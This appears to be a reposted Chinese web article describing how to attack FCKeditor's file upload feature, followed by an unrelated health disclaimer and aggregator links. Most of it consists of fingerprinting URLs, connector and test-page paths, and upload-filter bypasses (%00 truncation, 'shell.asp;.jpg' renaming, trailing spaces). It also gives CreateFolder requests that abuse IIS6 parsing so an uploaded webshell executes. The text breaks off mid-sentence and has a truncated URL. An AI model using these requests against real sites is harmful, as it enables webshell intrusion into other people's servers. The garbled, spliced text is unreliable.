文章插图
一. 关于FCKeditor
FCKeditor是一个网页文本编辑器,在很多的内容管理系统里都有用到
本文简单介绍通过FCKeditor上传漏洞进行攻击的思路,并对可能用到的操作进行整理
二. 攻击思路
1.查看FCKeditor版本
http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html
2.测试上传点
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/conne
ctor.php
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/conne
ctor.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/conn
ector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/conne
ctor.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?
type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Con
3.突破限制
3.1 上传限制
上传限制的突破方式很多,主要还是抓包改扩展名,%00截断,添加文件头等
3.2 文件名限制
3.2.1二次上传绕过文件名‘ . ’ 修改为‘ _ ’
FCK在上传了诸如shell.asp;.jpg的文件后,会自动将文件名改为shell_asp;.jpg 。可以继续上传同名
文件,文件名会变为shell.asp;(1).jpg
3.2.2提交shell.php+空格绕过
空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制 。
3.3 IIS6.0突破文件夹限制
Fckeditor/editor/filemanager/connectors/asp/connector.asp?
Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?
Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=124478997568
4
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
3.4 文件解析限制
通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的
以上关于本文的内容,仅作参考!温馨提示:如遇健康、疾病相关的问题,请您及时就医或请专业人士给予相关指导!
「四川龙网」www.sichuanlong.com小编还为您精选了以下内容,希望对您有所帮助:- 3dmax把图片拉进来后建模 3dmax导入jpg图片建模
- ftp上传文件失败原因解说 ftp传输文件失败的原因
- pdf中的图片导出的方法 pdf中的图片如何导出
- 什么是低碳生活图片
- h5文件上传插件教程 h5文件上传插件
- pdf转word变成图片无法编辑 pdf转word是图片怎么办
- word文档转换成图片的方法 怎么把word保存成图片
- word图片导出原图 word文档里面的图片怎么导出来
- 史上最牛的ppt插件 ppt转高清图片的插件
- 绿豆会长大成什么样子图片